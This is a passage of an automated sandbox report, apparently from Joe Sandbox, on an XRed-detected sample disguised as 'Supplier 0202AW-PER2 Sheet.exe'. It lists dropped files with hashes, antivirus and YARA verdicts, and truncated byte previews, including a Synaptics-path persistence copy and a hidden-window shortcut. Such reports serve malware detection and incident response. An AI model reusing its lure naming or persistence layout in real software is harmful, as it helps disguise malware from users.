                                                                                                                Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="-augCq12KlAGmWPeVN9IkQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                                Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1652
                                                                                                                Entropy (8bit):5.247121463970134
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24:GgsF+0k4SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+g+pAZewRDK4mW
                                                                                                                MD5:9D96E105E649BCD4F21C2C8F1F948CBB
                                                                                                                SHA1:F1EA19FB95F84021470CB92F753C4784040473CC
                                                                                                                SHA-256:A3DD2EBF2758C9591F10DBA32830018968AEB57F5913E2E8B6BC9EBD03E3FC19
                                                                                                                SHA-512:D4B00C803FFD33914D32A4465C2144B4B8083B5DE81C3FFEE052FE751F18A06425E8928A9DADDBB9006BB8225EC8B1822C8C03280DC116A418CC54064BB3F62B
                                                                                                                Malicious:false
                                                                                                                Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="-PgVYl-vIzi7xood3_1inQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                                Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1652
                                                                                                                Entropy (8bit):5.251571562235036
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24:GgsF+0BEXSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+wG+pAZewRDK4mW
                                                                                                                MD5:6FD3CA6097C0E14E77D34E9743C39ED5
                                                                                                                SHA1:0EAB06E91697694DD404B851F15F2F557DE361C9
                                                                                                                SHA-256:320FED0158324EA9C0B8DD710327A0A9BDAA31ECC67184A5A5BBE7550641E3D2
                                                                                                                SHA-512:7BA878BB9230108F57E7CEF2891EC29B3ABAA51C2469CC3AAF68EE295EB4DFA455A89ADEC2BFD3A380177C544A48FC4D2C3F8A616CE3C94A1BB5A0E1B896937A
                                                                                                                Malicious:false
                                                                                                                Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="w95uaxYvaZnTqbLbjbDr2w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                                Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                Category:modified
                                                                                                                Size (bytes):1652
                                                                                                                Entropy (8bit):5.256888177146626
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24:GgsF+0/zSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+s+pAZewRDK4mW
                                                                                                                MD5:B18BDCD561F8DE8A1A5C3996C3C24AE1
                                                                                                                SHA1:D7AF6EEA96A5251A54C613D5956A35B7AEC92226
                                                                                                                SHA-256:DEAC793CF72CBEB150597736ACA025940EA35D97BD5F26099E588CB02D222A98
                                                                                                                SHA-512:9656150D31FE918907E2FF457DF8B10C37551438BD18F2FAF204D62CB60AB5CE0B97CCC8A9CFEBC6FAAA61C1904FDF5C6689A7AB5E7FA0540D82B7E5AF4B2E59
                                                                                                                Malicious:false
                                                                                                                Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="upDKOlLaklIYlb7g1d9X0A">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                                Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1652
                                                                                                                Entropy (8bit):5.252597775649406
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24:GgsF+009nSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+J+pAZewRDK4mW
                                                                                                                MD5:BEDE156BC655A620612A40073190678A
                                                                                                                SHA1:17E317AB2587EB700B21F72C6DE4FC605F2163F3
                                                                                                                SHA-256:D2EA59060FA2FC35D88294A6D8F6977A435E8293592D3B8E9F0228AD297356C6
                                                                                                                SHA-512:3DFFDAEC96ABDA2332DC709F866E89003CC4C3B6EFE01FCEEB1CFB5DA7FF1FA72306DDE44CA774E9575CFB66B02FB5B1D547B624E8AAC6E360EC36E006F910FC
                                                                                                                Malicious:false
                                                                                                                Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="9XcbCX9uw_gGbj7lnvq0yg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                                Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1652
                                                                                                                Entropy (8bit):5.253843257075183
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24:GgsF+0+uSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+y+pAZewRDK4mW
                                                                                                                MD5:66C2E91EF87CEF2720335C191EC26BE7
                                                                                                                SHA1:9B1C7A417C4057341F49E8A1F596F860E034D6F2
                                                                                                                SHA-256:AE229579AF779B299652E21FE942CCD0B9D4EE3D1A520E5E45BE6CDBFACA3E73
                                                                                                                SHA-512:1C120E33B6776A87E834DB5491E0EC7893E3244C48AEEF6C098D0FB6AAA6D12D29AA4086AAC27B792127FE115486060CF3A13262338F66717A221A5D5939C697
                                                                                                                Malicious:false
                                                                                                                Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="2Ok6btycaAHmncoF3jlmjA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                                Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1652
                                                                                                                Entropy (8bit):5.265677308802923
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24:GgsF+0ZSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+C+pAZewRDK4mW
                                                                                                                MD5:ED1C750A8AB5B1C12C9A206D9331432A
                                                                                                                SHA1:52064C71B691927310499B1FEAD761E7F94190E3
                                                                                                                SHA-256:7634B4D6AF348B3A4C3CE0236734309EF220933DED3D1D004E965B96DE7E09FE
                                                                                                                SHA-512:4A0E33114764EBEB5ED05026ACF5729315760A2761801AC33C00254CE471C9AEDDB93D4EE2897245EDD00893A7BC97453CA395C853F74CC583AED87B62F6B3AD
                                                                                                                Malicious:false
                                                                                                                Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="JLMTxSOcJNDX_Yii_L5lmw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                                Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1652
                                                                                                                Entropy (8bit):5.261936101032919
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24:GgsF+0kcFISU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+YFI+pAZewRDK4mW
                                                                                                                MD5:A7E91F70E392859FE49A1EA95E9016BB
                                                                                                                SHA1:50CC402C4DD12D7A98A99B9D2895F8687D4C0024
                                                                                                                SHA-256:6101CD59C8AB34B42A12B8CE220865A6DDC4A1A0347C6E29C8C1D949E3E1AD58
                                                                                                                SHA-512:F075E60D9CCBB80AAE2DA53B4508B36906B4FAA4BD5E71DA1C76BDE46147CA17F298EDBC4FAAF6EE996CCA005F98408F743B54A6DB78C68484F182DCFB7F63F1
                                                                                                                Malicious:false
                                                                                                                Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="knSw49zEMs1GzAmy3KLpTw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                                Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                File Type:Microsoft Excel 2007+
                                                                                                                Category:dropped
                                                                                                                Size (bytes):18387
                                                                                                                Entropy (8bit):7.523057953697544
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:384:oUaZLPzMfVSa1VvYXmrsdPkLmDAx7r/l0:oUatwNSSvY2IdsHr/y
                                                                                                                MD5:E566FC53051035E1E6FD0ED1823DE0F9
                                                                                                                SHA1:00BC96C48B98676ECD67E81A6F1D7754E4156044
                                                                                                                SHA-256:8E574B4AE6502230C0829E2319A6C146AEBD51B7008BF5BBFB731424D7952C15
                                                                                                                SHA-512:A12F56FF30EA35381C2B8F8AF2446CF1DAA21EE872E98CAD4B863DB060ACD4C33C5760918C277DADB7A490CB4CA2F925D59C70DC5171E16601A11BC4A6542B04
                                                                                                                Malicious:false
                                                                                                                Preview:PK..........!...5Qr...?.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-..@.5.....(..8...-.[.g.......M^..s.5.4.I..P;..!....r....}._.G.`....Y....M.7....&.m1cU..I.T.....`.t...^.Bx..r..~0x....6...`....reb2m.s.$.%...-*c.{...dT.m.kL]Yj.|..Yp..".G.......r...).#b.=.QN'...i..w.s..$3..)).....2wn..ls.F..X.D^K.......Cj.sx..E..n._ ....pjUS.9.....j..L...>".....w.... ....l{.sd*...G.....wC.F... D..1<..=...z.As.]...#l..........PK..........!..U0#....L......._rels/.rels ...(...............
                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                File Type:data
                                                                                                                Category:dropped
                                                                                                                Size (bytes):165
                                                                                                                Entropy (8bit):1.7769794087092887
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:iXKG/4N+RMlW8td:iXlMlW8/
                                                                                                                MD5:37BD8218D560948827D3B948CAFA579C
                                                                                                                SHA1:24347FB0A66F2DA8AD3BAB818E3C24977104E5DA
                                                                                                                SHA-256:189E2D5600E0CC41F498D2EB22FA451F81746DCDBAA3EC1146A22C3A74452DA6
                                                                                                                SHA-512:A34D703FEBFD9E45A57BF047D9CCF890482B0F7CD3788F9BFD89DECA13B96DD4F43BDB0C4D81CC716DEAC37BCD1C393A7BCB159B471B5721B367E4884B17C699
                                                                                                                Malicious:false
                                                                                                                Preview:.user ..f.r.o.n.t.d.e.s.k. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                Category:dropped
                                                                                                                Size (bytes):32768
                                                                                                                Entropy (8bit):3.746897789531007
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:192:QuY+pHkfpPr76TWiu0FPZK3rcd5kM7f+ihdCF3EiRcx+NSt0ckBCecUSaFUH:ZZpEhSTWi/ekfzaVNg0c4gU
                                                                                                                MD5:7426F318A20A187D88A6EC88BBB53BAF
                                                                                                                SHA1:4F2C80834F4B5C9FCF6F4B1D4BF82C9F7CCB92CA
                                                                                                                SHA-256:9AF85C0291203D0F536AA3F4CB7D5FBD4554B331BF4254A6ECD99FE419217830
                                                                                                                SHA-512:EC7BAA93D8E3ACC738883BAA5AEDF22137C26330179164C8FCE7D7F578C552119F58573D941B7BEFC4E6848C0ADEEF358B929A733867923EE31CD2717BE20B80
                                                                                                                Malicious:false
                                                                                                                Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                Process:C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exe
                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Icon number=4, Archive, ctime=Mon Dec 30 08:58:02 2024, mtime=Mon Dec 30 08:58:02 2024, atime=Mon Dec 30 08:58:02 2024, length=913920, window=hide
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1817
                                                                                                                Entropy (8bit):3.447322035134466
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24:8g8IKqj5k2I94+UmeUQriJ7AR4oE2+s9T4IlIpbJPJtm:8JId62Iy+x8riJs6Cr9MIlUJPJt
                                                                                                                MD5:AA8F1A12D83A7397159B005736FA8458
                                                                                                                SHA1:3D1B83D32F210AAB3FE198CCD90CC5E00576B2B8
                                                                                                                SHA-256:50A213908AA41650A2C293C2CDEF0F6BF3F4284C0EA2FD00E2358F7F3F37F86F
                                                                                                                SHA-512:C5966AC4401388739BBEF78DB2B63A1BAAC2A00E58C27FB45136FB1B6320CE32DBB5E1DE30948DD3F81D109E1B45FB60959F2F7F113A1A477B0EF048A7FF1740
                                                                                                                Malicious:false
                                                                                                                Preview:L..................F.@.. ....vVP.Z.....P.Z.....P.Z............................:..DG..Yr?.D..U..k0.&...&......Qg.*_.....9K.Z...5.P.Z......t...CFSF..1.....EW.=..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.=.Y=O..........................3*N.A.p.p.D.a.t.a...B.V.1......Y;O..Roaming.@......EW.=.Y;O............................8.R.o.a.m.i.n.g.....V.1......YAO..Windata.@......YAO.YAO.... .......................0.W.i.n.d.a.t.a.....`.2......YBO .DELPQB.exe..F......YBO.YBO....8.....................q...D.E.L.P.Q.B...e.x.e.......d...............-.......c..................C:\Users\user\AppData\Roaming\Windata\DELPQB.exe..!.....\.....\.....\.....\.....\.W.i.n.d.a.t.a.\.D.E.L.P.Q.B...e.x.e.-.".C.:.\.U.s.e.r.s.\.f.r.o.n.t.d.e.s.k.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.W.i.n.d.a.t.a.\."...C.:.\.W.i.n.d.o.w.s.\.S.y.s.W.O.W.6.4.\.s.h.e.l.l.3.2...d.l.l.........%SystemRoot%\SysWOW64\shell32.dll...................................................................................................
                                                                                                                Process:C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exe
                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                Category:dropped
                                                                                                                Size (bytes):913920
                                                                                                                Entropy (8bit):7.851983325561796
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24576:2hloDX0XOf4Z79H8qN3k87zwVb2UDEus:2hloJf68qIyUDEu
                                                                                                                MD5:DB7FC8188230C44A2B7360862DCF26E9
                                                                                                                SHA1:648217F05DB22B2663A5D3284D2C699DA96423F4
                                                                                                                SHA-256:2180493DD5655C4CCF4CC17D0E3B1F69B9005DDC4152EB85EF7A8DA026A75573
                                                                                                                SHA-512:9010C19B2C792F90F8EDB1233C843B1D999AE84E1B2D49935E4790A8BD3B22446866B62A3F2C679DC89CAF33F0D5F620EB97D72DC5882388089BD709BE35EBDC
                                                                                                                Malicious:true
                                                                                                                Antivirus:
                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                • Antivirus: ReversingLabs, Detection: 55%
                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.............g.........$.............%....H......X.2........q)..Z..q).....q).......\....q).....Rich...........................PE..L...EBrg.........."......P........... .......0....@.......................................@...@.......@.........................$....0......................@........................................"..H...........................................UPX0....................................UPX1.....P.......D..................@....rsrc........0.......H..............@..............................................................................................................................................................................................................................................................................................................................................................3.07.UPX!....
                                                                                                                Process:C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exe
                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                Category:dropped
                                                                                                                Size (bytes):913920
                                                                                                                Entropy (8bit):7.851983325561796
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24576:2hloDX0XOf4Z79H8qN3k87zwVb2UDEus:2hloJf68qIyUDEu
                                                                                                                MD5:DB7FC8188230C44A2B7360862DCF26E9
                                                                                                                SHA1:648217F05DB22B2663A5D3284D2C699DA96423F4
                                                                                                                SHA-256:2180493DD5655C4CCF4CC17D0E3B1F69B9005DDC4152EB85EF7A8DA026A75573
                                                                                                                SHA-512:9010C19B2C792F90F8EDB1233C843B1D999AE84E1B2D49935E4790A8BD3B22446866B62A3F2C679DC89CAF33F0D5F620EB97D72DC5882388089BD709BE35EBDC
                                                                                                                Malicious:true
                                                                                                                Antivirus:
                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                • Antivirus: ReversingLabs, Detection: 55%
                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.............g.........$.............%....H......X.2........q)..Z..q).....q).......\....q).....Rich...........................PE..L...EBrg.........."......P........... .......0....@.......................................@...@.......@.........................$....0......................@........................................"..H...........................................UPX0....................................UPX1.....P.......D..................@....rsrc........0.......H..............@..............................................................................................................................................................................................................................................................................................................................................................3.07.UPX!....
                                                                                                                Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                File Type:Microsoft Excel 2007+
                                                                                                                Category:dropped
                                                                                                                Size (bytes):18387
                                                                                                                Entropy (8bit):7.523057953697544
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:384:oUaZLPzMfVSa1VvYXmrsdPkLmDAx7r/l0:oUatwNSSvY2IdsHr/y
                                                                                                                MD5:E566FC53051035E1E6FD0ED1823DE0F9
                                                                                                                SHA1:00BC96C48B98676ECD67E81A6F1D7754E4156044
                                                                                                                SHA-256:8E574B4AE6502230C0829E2319A6C146AEBD51B7008BF5BBFB731424D7952C15
                                                                                                                SHA-512:A12F56FF30EA35381C2B8F8AF2446CF1DAA21EE872E98CAD4B863DB060ACD4C33C5760918C277DADB7A490CB4CA2F925D59C70DC5171E16601A11BC4A6542B04
                                                                                                                Malicious:false
                                                                                                                Preview:PK..........!...5Qr...?.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-..@.5.....(..8...-.[.g.......M^..s.5.4.I..P;..!....r....}._.G.`....Y....M.7....&.m1cU..I.T.....`.t...^.Bx..r..~0x....6...`....reb2m.s.$.%...-*c.{...dT.m.kL]Yj.|..Yp..".G.......r...).#b.=.QN'...i..w.s..$3..)).....2wn..ls.F..X.D^K.......Cj.sx..E..n._ ....pjUS.9.....j..L...>".....w.... ....l{.sd*...G.....wC.F... D..1<..=...z.As.]...#l..........PK..........!..U0#....L......._rels/.rels ...(...............
                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                File Type:data
                                                                                                                Category:dropped
                                                                                                                Size (bytes):165
                                                                                                                Entropy (8bit):1.7769794087092887
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:iXKG/4N+RMlW8td:iXlMlW8/
                                                                                                                MD5:37BD8218D560948827D3B948CAFA579C
                                                                                                                SHA1:24347FB0A66F2DA8AD3BAB818E3C24977104E5DA
                                                                                                                SHA-256:189E2D5600E0CC41F498D2EB22FA451F81746DCDBAA3EC1146A22C3A74452DA6
                                                                                                                SHA-512:A34D703FEBFD9E45A57BF047D9CCF890482B0F7CD3788F9BFD89DECA13B96DD4F43BDB0C4D81CC716DEAC37BCD1C393A7BCB159B471B5721B367E4884B17C699
                                                                                                                Malicious:false
                                                                                                                Preview:.user ..f.r.o.n.t.d.e.s.k. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):771584
                                                                                                                Entropy (8bit):6.629891194746731
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:12288:aMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9IGr:ansJ39LyjbJkQFMhmC+6GD9Z
                                                                                                                MD5:1D45B99034D67448EBF0776BD5699C84
                                                                                                                SHA1:B0E8641656BE739AF701E0BC197DD3942172EA92
                                                                                                                SHA-256:7D8C783C45AFF23E64E6E801C0F988002078A0E8DA5F85285BB335F997E7E50D
                                                                                                                SHA-512:7E42677B23D34E7EFC0F5DDC6B8E7EB29F3998FF376FF6CC5B5E6D0E4B060F2A8B141C6A510067C901D371BD07EAB9C76E9216A7EE6EED47C1CB592E9E203F10
                                                                                                                Malicious:true
                                                                                                                Yara Hits:
                                                                                                                • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\Users\user\Documents\~$cache1, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\Documents\~$cache1, Author: Joe Security
                                                                                                                Antivirus:
                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                • Antivirus: ReversingLabs, Detection: 100%
                                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................&....................@.......................... ...................@..............................B*...........................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                File Type:MS Windows registry file, NT/2000 or above
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1835008
                                                                                                                Entropy (8bit):4.416728335008648
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:6144:Qcifpi6ceLPL9skLmb0moSWSPtaJG8nAgex285i2MMhA20X4WABlGuNQ5+:1i58oSWIZBk2MM6AFBWo
                                                                                                                MD5:40A09A580E377B9F0DF1DF0C3C1BD582
                                                                                                                SHA1:B5497C4544608E15A1F2E4C3A0135FF2D91CFE06
                                                                                                                SHA-256:3025D5CA6B1AB4755D0805592C0A6BAFA6D7E0C53E034E049B4A01B3A4495F0C
                                                                                                                SHA-512:8CA2A118B46BBEA62087522A6B753CCC9180D05FD1DB0CE792E029C9B4154A170C68485570B37140F5E71E4DF04E12BE2217B188DF0BAEBE214037F888D227BD
                                                                                                                Malicious:false
                                                                                                                Preview:regfE...E....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.7...Z................................................................................................................................................................................................................................................................................................................................................'........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                Entropy (8bit):7.450501854996061
                                                                                                                TrID:
                                                                                                                • Win32 Executable (generic) a (10002005/4) 93.09%
                                                                                                                • Win32 Executable Borland Delphi 7 (665061/41) 6.19%
                                                                                                                • UPX compressed Win32 Executable (30571/9) 0.28%
                                                                                                                • Win32 EXE Yoda's Crypter (26571/9) 0.25%
                                                                                                                • Win32 Executable Delphi generic (14689/80) 0.14%
                                                                                                                File name:Supplier 0202AW-PER2 Sheet.exe
                                                                                                                File size:1'685'504 bytes
                                                                                                                MD5:97e5ba8188b0e2613fd02ee2b8dfee7a
                                                                                                                SHA1:17e314b66392d3d14e68f3e4a0ce4e3649255835
